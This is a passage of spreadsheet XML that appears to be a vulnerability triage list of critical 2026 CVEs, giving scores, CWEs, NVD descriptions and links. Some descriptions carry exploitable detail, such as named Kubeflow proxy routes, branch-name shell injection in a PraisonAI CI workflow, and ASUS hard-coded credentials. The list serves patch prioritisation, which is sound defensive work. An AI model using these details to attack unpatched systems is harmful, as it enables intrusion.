      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47691</t>
        </is>
      </c>
      <c r="C28" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G28" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H28" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I28" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`). In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key. This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under the parent domain's key. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47691</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48056</t>
        </is>
      </c>
      <c r="C29" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E29" s="5" t="inlineStr"/>
      <c r="F29" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-749</t>
        </is>
      </c>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Versions prior to 2.5.0  improperly validate executable paths supplied to the  run-download  IPC handler, allowing a compromised renderer process to execute arbitrary local binaries with the application’s privileges. Version 2.5.0 contains a patch.</t>
        </is>
      </c>
      <c r="M29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48056</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48168</t>
        </is>
      </c>
      <c r="C30" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions prior to 4.6.40, the bundled Claude GitHub Actions workflow is vulnerable to command injection because it embeds an attacker-controlled pull request branch name into a Bash run: block without quoting or validation. Additionally, the workflow allows any @claude comment to trigger the job regardless of whether the commenter is a trusted collaborator. An outside contributor can open a pull request from a fork whose branch name contains shell metacharacters and comment @claude, causing Bash to execute arbitrary shell code in the GitHub Actions runner. Because these commands run in a job holding a GitHub App token with write permissions, OIDC access, and gh/git access, the injection can be chained through $GITHUB_PATH to compromise later privileged steps, enabling repository writes, pull request and issue manipulation, or OIDC-token abuse. This issue has been fixed in version 4.6.40.</t>
        </is>
      </c>
      <c r="M30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48168</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49883</t>
        </is>
      </c>
      <c r="C31" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G31" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="C32" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G32" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="C33" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G33" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="M33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70352</t>
        </is>
      </c>
      <c r="C34" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G34" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Language allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70352</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73299</t>
        </is>
      </c>
      <c r="C35" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G35" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>Prompty is a markdown file format (.prompty) for LLM prompts. Prior to 0.1.5 and 2.0.0-beta.5, the TypeScript Nunjucks renderer evaluated untrusted .prompty template bodies with unrestricted JavaScript member access. An attacker-controlled template could traverse constructor and prototype properties to execute JavaScript in the host Node.js process. This issue is fixed in versions 0.1.5 and 2.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73299</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75754</t>
        </is>
      </c>
      <c r="C36" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-798, CWE-918</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function, Server-Side Request Forgery (SSRF), and Use of Hard-coded Credentials in ASUS Control Center allow an unauthorized user to obtain the encryption key via an HTTP request, causing a local service to enable SSH on port 2222. The attacker can then log in with the hardcode credentials to obtain a root shell, enabling direct reading, writing, and deletion of data on ASUS Control Center, as well as remote control of all servers, PCs, and workstations within the company.
Refer to the 'Security Update for ASUS Control Center' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75754</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77770</t>
        </is>
      </c>
      <c r="C37" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>The miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 does not require a validated transaction before deleting site options whose names come from unauthenticated request input, allowing any visitor to delete arbitrary options, which can lock every administrator out of the dashboard or deactivate every miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 on the site.</t>
        </is>
      </c>
      <c r="M37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77770</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79696</t>
        </is>
      </c>
      <c r="C38" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G38" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>A Code Injection vulnerability in adk web in Google Cloud Agent Development Kit (ADK) for Python versions 2.0.0 through 2.6.0 on Python (OSS), Cloud Run, and GKE environments where pytest is installed allows an unauthenticated remote attacker to execute arbitrary code using a crafted test session replay.</t>
        </is>
      </c>
      <c r="M38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79696</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80098</t>
        </is>
      </c>
      <c r="C39" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G39" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H39" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot_studio</t>
        </is>
      </c>
      <c r="I39" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Copilot Studio allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80098</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="C40" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="I40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83711</t>
        </is>
      </c>
      <c r="C41" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G41" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure, active directory</t>
        </is>
      </c>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83711</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="C42" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>MapLibre GL JS is an interactive vector tile map library for web browsers. Prior to 6.4.1, DOM.sanitize() in src/util/dom.ts iterates elem.attributes as a live NamedNodeMap while removeAttributes() removes attributes from the same collection, shifting indexes and skipping an adjacent dangerous attribute. An attacker who controls untrusted third-party style attribution strings or user-supplied custom attributions can supply consecutive dangerous attributes, causing an attribute such as onload or ontoggle to survive sanitization and execute when the attribution control inserts the content into innerHTML. A victim must render the affected map content for the script to execute. This issue is fixed in version 6.4.1.</t>
        </is>
      </c>
      <c r="M42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85978</t>
        </is>
      </c>
      <c r="C43" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>CWE-41, CWE-863, CWE-94</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote code execution vulnerability exists in the Policy Manager console of Akana API Platform. A path normalization discrepancy between the authentication filter and the servlet dispatcher allows a crafted request to bypass authentication and reach an endpoint that evaluates attacker-supplied script code without sandboxing, resulting in arbitrary code execution. Exploitation requires no authentication or user interaction.</t>
        </is>
      </c>
      <c r="M43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85978</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86152</t>
        </is>
      </c>
      <c r="C44" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Tenda CP3 27.5.57.101. The impacted element is the function CAutoAddWifi::ThreadProc of the file Functions/AutoAddWifi.cpp of the component Kylin. Executing a manipulation can lead to os command injection. The attack may be launched remotely.</t>
        </is>
      </c>
      <c r="M44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86152</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87827</t>
        </is>
      </c>
      <c r="C45" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>Certain KGUARD DVR devices running vulnerable firmware expose a system command execution service on all network interfaces without requiring authentication. A remote unauthenticated attacker with network access to the affected service can execute arbitrary system commands on the device, potentially resulting in complete compromise of the DVR.
The vulnerability is known to have been exploited in the wild by the Mirai_ptea (Rimasuta) and Mirai_aurora botnets for malware propagation and subsequent DDoS activity. The vulnerability was reported to affect firmware dating from 2016, while firmware released after 2017 appears to mitigate the issue by restricting the affected service to the localhost interface (127.0.0.1) instead of exposing it on all interfaces (0.0.0.0).
The affected-device list reported by Netlab includes many D1004NR, D1008NR, D1016NR, D1104, D1104NR, D1108NR, D1116NR, D1132NR, D2116NR, D97xx, D98xx, and D99xx variants and several associated hardware revisions
The exploit is included in some version of rapperbot and exploited in 2026. This assignment has been made to document the active exploitation and lack of documentation from the vendor.</t>
        </is>
      </c>
      <c r="M45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87827</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12645</t>
        </is>
      </c>
      <c r="C46" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12646</t>
        </is>
      </c>
      <c r="C47" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12647</t>
        </is>
      </c>
      <c r="C48" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr">
